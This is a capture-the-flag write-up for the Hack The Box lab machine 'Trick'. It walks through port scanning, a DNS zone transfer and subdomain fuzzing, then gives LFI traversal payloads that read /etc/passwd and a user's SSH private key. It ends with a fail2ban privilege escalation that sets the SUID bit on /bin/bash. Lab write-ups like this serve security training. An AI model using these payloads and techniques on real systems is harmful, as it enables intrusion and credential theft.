Trick - HTB - Key Points
October 11, 2022•523 words
Target's IP: 10.10.11.166
nmap -sS -p- -T4 --min-rate=10000 10.10.11.166
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
└─# nslookup
> server 10.10.11.166
Default server: 10.10.11.166
Address: 10.10.11.166#53
> 10.10.11.166
166.11.10.10.in-addr.arpa name = trick.htb.
We add this domain name to our /etc/hosts file. Now we can enumerate further for subdomains.
Asking for a zone transfer with
dig axfr trick.htb @trick.htb
reveals a new subdomain, preprod-payroll.
Enumerating possible files and directories on this new domain reveals this page:
http://preprod-payroll.trick.htb/users.php
where we can find an administrator,
EnemigosssAnother page,
http://preprod-payroll.trick.htb/manage_user.php?id=1
reveals the following juicy information:
value="SuperGucciRainbowCake"Testing for potential vulnerabilities, we also find out that http://preprod-payroll.trick.htb/manage_user.php?id=1 is SQL injectable, but this turns out to be fairly pointless as you cannot find much in the DB.
Looking at the subdomain naming dynamic, we can try to enumerate for more subdomains like this:
ffuf -u http://trick.htb -H "Host:preprod-FUZZ.trick.htb" -w <wordlist>
which reveals the preprod-marketing subdomain.
On this new website we find a LFI vulnerability, and using the most common LFI bypass payloads we can retrieve useful information, like
/index.php?page=....//....//....//....///etc/passwd ###this reveals a user michael
/index.php?page=....//....//....//....///home/michael/.ssh/id_rsa
Using the SSH key we can log into the box as michael and retrieve the user flag.
Enumerating for potential privesc vectors, the user has the possibility to run a fail2ban command as root without requiring the password.
Following this research blog:
https://grumpygeekwrites.wordpress.com/2021/01/29/privilege-escalation-via-fail2ban/
we see that we could modify the behaviour of fail2ban upon starting to gain elevated privileges.
We as part of security group can access the iptables-multiport.conf file, but we cannot simply edit it as we don't have the right permissions. We do have permissions, however, on the directory, so we can modify the file using the following approach:
mv iptables-multiport.conf tmp
mv tmp iptables-multiport.conf ###the file has a different owner now
chmod 666 iptables-multiport.conf
nano iptables-multiport.conf ###set the restart action as chmod +s /bin/bash
Now, once we restart fail2ban, the bash binary has the SUID bit set, so we can escalate our privileges and retrieve the root flag.
Merry hacking ;)